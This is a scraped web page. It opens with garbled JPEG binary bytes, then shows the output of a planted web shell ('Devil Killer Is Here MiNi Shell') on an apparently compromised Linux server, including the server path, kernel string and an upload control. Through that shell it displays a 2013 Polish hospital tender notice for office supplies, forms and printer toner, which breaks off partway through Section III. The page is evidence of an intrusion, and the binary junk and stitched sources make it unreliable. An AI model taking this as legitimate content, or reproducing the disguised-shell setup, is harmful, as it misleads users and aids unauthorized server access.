JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130612/225724-N-2013.html

<p class="kh_header"><b>Cibórz: Dostawa materiałów biurowych, druków i materiałów eksploatacyjnych do drukarek i kserokopiarek</b><br>
<b>Numer ogłoszenia: 225724 - 2013; data zamieszczenia: 12.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych, Samodzielny Publiczny Zakład Opieki Zdrowotnej , 66-213 Cibórz, woj. lubuskie, tel. 068 3419335 w. 265, faks 068 3419494.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciborz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, druków i materiałów eksploatacyjnych do drukarek i kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: Materiały biurowe
1	Papier A-4 80g do drukarek i ksreokopiarek
	ryza	1724
2	Papier do drukarek igłowych gramatura min 60, ilość składek w kartonie min. 2000, ilość warstw 1+0, kolor biały
	karton	1
3	Papier A-3 80g do kserokopiarki
	ryza	33
4	Taśma klejąca 19mm x 33m
	szt.	726
5	Taśma pakowa brązowa 48mmx66m klej kauczukowy naturalny 	szt.	60
6	Spinacze 28mm (op. po 100 szt.)
	op.	360
7	Klipsy biurowe (19mm) op po 12 szt.
	op.	60
8	Klipsy biurowe (32mm) op po 12 szt
	op.	63
9	Klipsy biurowe (51mm) op po 12 szt
	op.	38
10	Klipsy biurowe (25mm) op po 12 szt
	op.	37
11	Zszywki 24/6 op. po 1000 szt.
	op.	300
12	Zszywki 23/10 op. po 1000 szt.
	op.	15
13	Zszywacz średni, zszywający min 30 kartek
	szt.	34
14	Marker czarny 	szt.	141
15	Marker biały 
	szt.	28
16	Marker czerwony
	szt.	65
17	Marker niebieski
	szt.	62
18	Marker czarny do opisywania płyt CD cienki
	szt.	37
19	Markery wodoodporne 4 kolory
	op.	46
20	Koszulki krystaliczne, A4 op.100 szt., grubość folii nie mniej niż 48 mic, multiperforowane	op.	144
21	Segregator formatu A4, szerokość grzbietu 75mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia. 	szt.	215
22	Segregator formatu A4, szerokość grzbietu 50mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia 	szt.	121
23	Segregator formatu A5, szerokość grzbietu 75mm,  wyposażony w mechanizm dźwigniowy oraz blokadę, dolne krawędzie wzmocnione niklowanym okuciem, otwór na palec na grzbiecie również wzmocniony niklowanym okuciem, kolory do ustalenia	szt.	19
24	Teczka kartonowa z gumką A4, wykonana z kartonu o gramaturze 250 g/m2, kolor biały, nadruk umożliwiający opis zawartości	szt.	2129
25	Teczka kartonowa wiązana A4, wykonana z kartonu o gramaturze 250 g/m2, kolor biały, nadruk umożliwiający opis zawartości	szt.	1175
26	Teczka kartonowa z gumką A4, wykonana z kartonu o gramaturze 250 g/m2, różne kolory, nadruk umożliwiający opis zawartości	szt.	801
27	Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu niebieski 	szt.	714
28	Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu czerwony 	szt.	272
29	Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu czarny	szt.	95
30	Długopis zwykły, długość linii pisania min. 1700 m, kolor wkładu zielony	szt.	78
31	Długopis żelowy z wymiennym wkładem, przeźroczysta obudowa, ze skuwką. Kolor wkładu czarny. Typu Pentel K-106 lub równoważny 	szt.	97
32	Długopis typu Pentel BK66 lub równoważny  wkład niebieski
	szt.	177
33	Dziurkacz metalowy, z blokadą rączki, ogranicznik formatu wg. Norm DIN, odstęp między dziurkami 80 mm, dziurkuje jednorazowo nie mniej niż 25 kartek papieru 80g. 	szt.	24
34	Zeszyt w kratkę A5 miękka okładka 60 kart 	szt.	126
35	Zeszyt w kratkę A4 twarda okładka 96 kart 	szt.	90
36	Zeszyt w kratkę A4 twarda okładka 192 kart	szt.	37
37	Zeszyt w kratkę A-5 twarda okładka 96 kart
	szt.	57
38	Zeszyt w kratkę A-4 twarda okładka 160 kart
	szt.	26
39	Zeszyt w linie A-4 twarda okładka 96 kart
	szt.	16
40	Korektor w taśmie, ergonomiczna obudowa, wymiar taśmy 4,2 mm x 9 m, nie pozostawia śladów na kserokopiach, odporny na światło. Szybkoschnąca  końcówka korektorująca wyposażona w zatyczkę. 	szt.	76
41	Korektor w płynie z gąbką, szybkoschnący, pojemność nie mniej niż 20 ml. 	szt.	107
42	Korektor w piórze, pojemność 12 ml, przeźroczysta nasadka, Typu Pentel ZLC31 lub równoważny	szt.	80
43	Szpilki 50g	szt.	24
44	Pinezki op. po 50 szt.	op.	30
45	Pinezki beczułki kolorowe op. po 50 szt.	op.	45
46	Nożyczki biurowe z satynowym ostrzem ze stali nierdzewnej, rękojeść z niełamliwego plastiku, całkowita długości 17cm, 	szt.	75
47	Folia laminacyjna min 80 micron A-4
	szt.	1100
48	Ołówek drewniany z gumką , twardość HB, grafit w całości wklejany	szt.	275
49	Grafity do ołówka automatycznego (0,5mm HB)	op.	12
50	Temperówka aluminiowa jednootworowa
	szt.	67
51	Gumka do ścierania grafitu z papieru nie niszczy ścieranej powierzchni, wymiar około (4cm x 1cm x 2cm) 	szt.	84
52	Przekładki kartonowe kolorowe do segregatora A-4 (10,5cm x 24cm) 	szt.	1144
53	Karteczki samoprzylepne żółte, wymiar 75 x 75 mm w bloczku 100 karteczek	szt.	142
54	Karteczki samoprzylepne żółte, wymiar 40 x 50 mm, w bloczku 100 karteczek, w op. 3 bloczki	op.	92
55	Karteczki samoprzylepne żółte, wymiar 50 x 75 mm w bloczku 100 karteczek	szt.	87
56	Zakładki indeksujące, cienkie foliowe 12x43mm, op. 4 kolory po 50 szt. 	op.	16
57	Klej w sztyfcie, nietoksyczny, nie zawiera rozpuszczalników, nie niszczy ani nie deformuje klejonych kartek, 15g. Typu Donau lub równoważny	szt.	90
58	Klej biurowy w tubce 40 ml
	szt.	80
59	Tusz do pieczątek, kolor czerwony, pojemność nie mniej niż 25ml typu Noris lub równoważny	szt.	83
60	Tusz do pieczątek, kolor czarny, pojemność nie mniej niż 25ml typu Noris lub równoważny	szt.	33
61	Zakreślacz fluorescencyjny z tuszem na bazie wody, z możliwością napełniania , ścięta końcówka, szerokość linii od 2do 5mm, op.4kolory. 	op.	69
62	Cienkopis biurowy, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal opakowanie zawiera 6 kolorów. Typu Stabilo Point 88  lub równoważny	op.	40
63	Cienkopis biurowy, kolor czarny, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny	szt.	44
64	Cienkopis biurowy, kolor zielony, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny	szt.	39
65	Cienkopis biurowy, kolor czerwony, końcówka fibrowa, skuwka wentylowana, średnica pisania 0,4 mm. Końcówka oprawiona w metal. Typu Stabilo Point 88  lub równoważny	szt.	44
66	Koperta biała C6 (114mm x 162mm) samoprzylepne
	szt.	7560
67	Koperta biała  C4 (229mm x 324mm) samoprzylepne
	szt.	1360
68	Koperta biała C5 (229mm x 162mm) samoprzylepne
	szt.	2140
69	Koperta E4 280x400x40 mm, rozszerzane boki i dno, biała, samoprzylepne
	szt.	442
70	Koperta szara format B5 (176mm x 250mm) samoprzylepne	szt.	3770
71	Skoroszyt A4 z PCV, wpinany z multiperforacją, przednia okładka przeźroczysta, tylna kolorowa, wyposażony w papierowy, wysuwany pasek do opisu, 	szt.	371
72	Wąsy do skoroszytu 	szt.	336
73	Skoroszyty zwykłe, papierowe, kolor biały, karton o grubości min.250g/m2. 	szt.	2675
74	Identyfikatory wielorazowe z klipsem i agrafką, przeźroczysty, 	szt.	104
75	Identyfikatory wielorazowe na smyczy, przeźroczysty,	szt.	259
76	Okładka do bindowania przeźroczysta, bezbarwna, grubość folii 150 mic 	szt.	110
77	Okładka kartonowa do bindowania, wykonane z kartonu 250g/m2, obustronnie kolorowy, struktura skóropodobna, kolor do uzgodnienia	szt.	130
78	Grzbiety plastikowe do bindowania 14 mm 	szt.	60
79	Grzbiety plastikowe do bindowania 22 mm 	szt.	60
80	Blok techniczny biały A-4
	szt.	122
81	Pudło archiwizacyjne grzbiet 150mm dł. 355mm wys. 250mm typu Esselte lub równoważny
	szt.	115
82	Karton archiwizacyjny zamykany z góry dł 350mm szer 350mm wys. 280mm typu Esselte lub równoważny 
	szt.	71
83	Pudło archiwizacyjne grzbiet 100mm dł. 345mm wys. 245mm typu Esselte lub równoważny
	szt.	76
84	Papier do faxu 210/15m
	szt.	102
85	Taśma do metkownicy dwurzędowej
	szt.	152
86	Wałek tuszujący do metkownicy dwurzędowej BLITZ
	szt.	6
87	Taśma barwiąca do maszyny do pisania
	szt.	4
88	Linijka 40 cm przeźroczysta
	szt.	52
89	Płyta CD-R 700MB	szt.	1524
90	Płyta  DVD R+ 4,7GB	szt.	672
91	Koperty na płyty CD i DVD z okienkiem
	szt.	1652
92	Kalka maszynowa A-4
	op.	25
93	Pisaki zwykłe opakowanie 12 kolorów
	op.	42
94	Pisaki zwykłe opakowanie 6 kolorów
	op.	51
95	Blok notatnikowy w kratkę A4 /100kartek, grzbiet klejony	szt.	50
96	Okładka na dyplomy z godłem Polski format A-4	szt.	3
97	Okładka na dyplomy A-4
	szt.	10
98	Koperta biała B4 HK (250 x 353 mm) rozszerzane boki , samoprzylepna z paskiem	szt.	1105
99	Papier kancelaryjny w kratkę format A-3	arkusz	101
100	Papier do drukarek A4 mix kolorów (4 kolorów po 50 arkuszy)	ryza	14
101	Papier do drukarek biały A4 gramatura min 160g/m2	ryza	5
102	Koperta biała DL (110 x 220 mm) z okienkiem z prawej strony  	szt.	1010
103	Tusz do pieczątek, kolor niebieski, pojemność nie mniej niż 25ml typu Noris lub równoważny	szt.	9
104	Taśma klejąca 18mm x 20m	szt.	82
105	Skorowidz format A4  192 kartek	szt.	17
106	Blok papieru samoprzylepnego kolorowego formatu A4 (mix kolorów)	szt.	22
107	Koszulki krystaliczne, A5 op.100 szt., grubość folii nie mniej niż 48 mic, multiperforowane	op.	14
108	Koperta bez kleju do klisz RTG brązowa rozmiar 370 x 370 mm	szt.	800
109	Koperta bez kleju do klisz RTG brązowa rozmiar 370 x 450 mm	szt.	800
110	Marker suchościeralny na bazie alkoholu, okrągła końcówka o gr. Min. 1,9 mm kolor czarny typu Pentel White Board Marker lub równoważny	szt.	29
111	Półka na dokumenty A4 wysokość ścianki bocznej min. 60 mm	szt.	60
112	Kalka maszynowa A-3	op.	3
113	Skoroszyt A4 z PCV, niewpinany, przednia okładka przeźroczysta, tylna kolorowa, wyposażony w papierowy, wysuwany pasek do opisu, 	szt.	90
114	Kostka papierowa nieklejona biała 85 x 85 mm wys. Min. 75 mm	szt.	30
115	Blok techniczny kolor A-4	szt.	80
116	Blok techniczny kolor A-3	szt.	75
117	Papier techniczny A3 160g kolor czerwony ryza po 250 arkuszy	ryza	2
118	Papier do drukarek A4 80g kolorowy, kolory do uzgodnienia ryza po 500 arkuszy	ryza	5
119	Papier do drukarek A3 80g mix kolorów ryza po 300 arkuszy	ryza	3
120	Bibuła marszczona, kolory do uzgodnienia	szt.	271
121	Farby plakatowe typu Astra lub równoważne, 12 kolorów o poj. Min. 20 ml	op.	55
122	Klej w tubce typu Magic lub równoważny	szt.	90
123	Modelina 6 kolorów	op.	25
124	Pędzelek nr 3	szt.	44
125	Pędzelek nr 6	szt.	44
126	Pędzelek nr 8	szt.	43
127	Nożyczki o ostrzu wzorkowym	szt.	20
128	Kredki grube typu Bambino lub równoważne 12 kolorów	op.	40
129	Kredki pastele olejne typu Pentel lub równoważne 12 kolorów	op.	38
130	Teczka kartonowa z gumką A3, wykonana z kartonu o gramaturze 250 g/m2, kolor biały, nadruk umożliwiający opis zawartości	szt.	50
131	Blok notatnikowy w kratkę A6 /100kartek, grzbiet klejony	szt.	25
132	Spinacze 50mm (op. po 100 szt.)	op.	10
133	Linijka 20 cm nieprzeźroczysta. plastikowa
	szt.	5
134	Zszywacz duży liczba jednorazowo zszywanych kartek min. 100	szt.	1
135	Dziurkacz duży metalowy Leitz Nexxt Series lub równoważny, dziurkujący jednorazowo min. 30 kartek 	szt.	1
136	Poduszka do stempli 17 cm x 11,5 cm wkład gąbka	szt. 	1
137	Długopis niebieski Uni lakubo lub równoważny	szt.	12
138	Teczka akt osobowych, mocna tektura oblewana folia PCV z elastycznie formowanym grzbietem, wyposażona w kieszonkę na grzbiecie, 4 sztuki wewnętrznych listew z zapięciami skoroszytowymi, 4 sztuki przekładek personalnych (wg wzoru kodeksu pracy) 	szt.	200
139	Karteczki samoprzylepne żółte, wymiar 76 x 127 mm w bloczku 100 karteczek	szt.	20
140	Pędzel płaski szer. 5 cm	szt. 	2
141	Pędzel płaski szer. 10 cm	szt.	2
142	Kredki pastele suche 12 kolorów	op. 	10
143	Klips archiwizacyjny plastikowy a100	op.	1
144	Marker czarny typu Colli-Marker lub równoważny, grubość kreski 1-4 mm	szt.	20
Zadanie 2: Druki
1	Książka raportów pielęgniarskich typ: MZ/SzP-15N lub równoważne
	szt.	236
2	Książka gabinetu zabiegowego A4 typ: Mz/Og-9 lub równoważne
	szt.	40
3	Księga Ruchu Chorych typ: MZ/SzP-61lub równoważne, A-4
	szt.	24
4	Druki Dowód wypłaty typ 402-5 lub równoważne 
	bloczek	20
5	Druk Zaświadczenie o zarobkach index 02023 lub równoważne, A-5
	szt.	300
6	Druk Lista obecności typ 506-1lub równoważne, A-4 blok 40 kartek
	szt.	14
7	Druk Polecenie wyjazdu służbowego typ 505-3 lub równoważne, A-5, blok 40 kartek
	szt.	25
8	Druk Roczna karta ewidencji obecności w pracy typ 508-3 lub równoważne karton 50 szt.
	szt.	9
9	Druk: Ewidencja wyjść w godzinach służbowych typ 574-1 lub równoważne
	szt.	3
10	Pocztowa książka nadawcza A-5
	szt.	16
11	Dziennik do korespondencji 300 kart, A-4 oprawa introligatorska	szt.	9
12	Druk: Historia Choroby - Szpital Psychiatryczny typ: MZ/3-90/SzP-70 lub równoważne blok po 100 szt.
	blok	35
13	Druk: Wkłady do historii choroby - Szpital Psychiatryczny typ: MZ/3-90/SzP-70a lub równoważne blok po 100 szt.
	blok	35
14	Druk: Potwierdzenie odbioru rzeczy chorego typ: MZ/SzP-20/s lub równoważne
	blok	50
15	Druk: Historia Choroby - Poradnia Zdrowia Psychicznego typ: MZ/3-90/Ps-1 lub równoważne blok po 100 szt.	blok	17
16	Druk: Wkłady do historii choroby - Poradnia Zdrowia Psychicznego typ: MZ/3-90/Ps-1a lub równoważne blok po 100 szt.	blok	17
17	Druk: Wyciąg z historii choroby psychiatrycznej typ: MZ/3-90/SzP-71 lub równoważne blok po 80 szt.	blok	1
18	Druk: Księga Przyjęć i odmów typ: MZ/SzP-58 lub równoważne
	szt.	6
19	Druk: Księga oczekujących pacjentów na udzielenie świadczeń typ: MZ/Ks-4 lub równoważne
	szt.	3
20	Druk: Dziennik budowy DB2 A-4 60 kartek
	szt.	2
21	Druk: Kwitariusz przychodowy typ: 400-3 lub równoważne
	szt.	22
22	Druk: Kartoteka magazynowa typ: 344-3 lub równoważne op. po 50 szt.
	op.	15
23	Druk: Magazyn przyjmie typ: 372-3 lub równoważne	blok	15
24	Druk: Zestawienie dzienne oddziału typ: Mz/Szp-1 lub równoważne	blok	256
25	Druk: Indyw. Karta zlec. Lek. (pozioma) typ: Mz/Szp-12a lub równoważne	blok po 100 szt.	122
26	Druk: Karta gorączkowa ogólna typ: Mz/Szp-16 lub równoważne	blok po 100 szt.	102
27	Druk: Karta ewid. Pacjenta szp. Psychiat. typ: Mz/ Szp-77a lub równoważne	szt.	1500
28	Druk: Aktualizacja wywiadu typ: Ps-IV lub równoważne	szt.	350
29	Druk: Księga główna chorych typ: Mz/Szp-23 lub równoważne	szt.	3
30	Druk: Księga raportów lekarskich typ: Mz/Szp-18 lub równoważne	szt.	37
31	Dziennik do korespondencji 96 kart, A-4 oprawa introligatorska	szt.	3
32	Druk: Książka kontroli format A4 twarda oprawa	szt.	1
33	Druk: Książka zameldowań format A4 96 stron, typ: E-21/48 lub równoważne
	szt.	2
34	Druk: Kwestionariusz rodzinnego wywiadu środowiskowego typ: Ps-I lub równoważne	szt.	210
35	Druk: Książka pracowni diagnostycznej	szt.	12
36	Druk: Książka Gabinetu Fizjoterapii wzór na bazie Książki gabinetu zabiegowego z poz. 2, do uzgodnienia po wyborze oferty	szt.	3
37	Druk: Zaświadczenie lekarskie format A6, typ: Mz/L-1 lub równoważne blok a100 kartek	blok po 100 szt.	2
38	Druk: Wywieszka magazynowa, typu M-25 lub równoważne, format A-6 op. a100, 	op.	5
Zadanie 3: Materiały eksploatacyjne do drukarek i kserokopiarek
1	Toner do HP DeskJet 520 czarny
	szt.	3
2	Toner do HP Photosmart C3180 czarny
	szt.	10
3	Toner do HP Photosmart C3180 color
	szt.	5
4	Toner do BROTHER DCP-8070D
	szt.	6
5	Toner do Oki B410 DN
	szt.	38
6	Toner do BROTHER DCP-7030
	szt.	44
7	Toner do BROTHER 7010L
	szt.	3
8	Toner do HP LaserJet 1018
	szt.	16
9	Toner do HP LaserJet P1006
	szt.	6
10	Taśma do drukarki OKI MIKROLINE 3320
	szt.	3
11	Toner do XEROX PHASER 3300MFP
	szt.	5
12	Toner do HP P2055DN
	szt.	4
13	Toner do HP LaserJet 1022
	szt.	4
14	Toner do LEXMARK Z612
	szt.	11
15	Bęben do drukarki BROTHER DCP-7030
	szt.	12
16	Toner do HP 3745 czarny
	szt.	1
17	Toner do HP 3745 kolor
	szt.	1
18	Toner do HP Laser Jet M1319fMFP
	szt.	10
19	Toner do  CANON IR5000
	szt.	5
20	Toner do SAMSUNG ML-1640 MONO LASER SPRINTER	szt.	3
21	Toner do HP LaserJet 1020
	szt.	20
22	Toner HPDeskJet Ink Advantage 2060 - czarny	szt.	12
23	Toner do BROTHER DCP7055 	szt.	6
24	Toner do LEXMARK E220	szt.	2
25	Toner do BROTHER HL-2240D	szt.	7
26	Tusz do HP Officejet 6000 czarny	szt.	5
27	Tusz do HP Officejet 6000 kolor	kpl.	5
28	Tusz do HP DeskJet D1660 czarny	szt.	10
29	Toner do BROTHER DCP-J315W (4 Ink Cartridges)	kpl.	6
30	Toner do SAMSUNG SCX-4300	szt.	3
31	Toner do CANON LBP-810	szt.	2
32	Bęben do drukarki OKI B410 Dn	szt.	9
33	Tusz HP703 czarny	szt.	6
34	Toner do CANON Pixma MP250 czarny 	szt.	5
35	Toner do CANON Pixma MP250 kolor 	szt.	5
36	Bęben do BROTHER DCP 7010L	szt.	1
37	Toner do HP DeskJet 930C czarny	szt.	5
38	Toner do HP DeskJet 930C kolor	szt.	8
39	Toner do BROTHER DCP 7065 DN	szt.	203
40	Bęben do BROTHER DCP 7065 DN	szt.	52
41	Tusz do drukarki HP PSC 1510 All-in-One 	kpl.	2
42	Taśma do drukarki OKI MIKROLINE 591 	szt.	2
43	Toner do BROTHER DCP-J315W - kolor czarny	szt.	10
44	Toner do SAMSUNG ML-1665 LASER SPRINTER	szt.	3
45	Bęben do drukarki BROTHER DCP-8070D
	szt.	2
46	Toner do HP LaserJet 1600 czarny	szt.	2
47	Toner do HP LaserJet 1600 zółty	szt.	1
48	Toner do HP LaserJet 1600 niebieski	szt.	1
49	Toner do HP LaserJet 1600 czerwony	szt.	1
50	Toner do OKI B4100	szt.	6.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 22.80.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć oświadczenie z art. 22 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu zostaną dokonane zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć oświadczenie z art. 22 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu zostaną dokonane zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć oświadczenie z art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu zostaną dokonane zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć oświadczenie z art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu zostaną dokonane zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
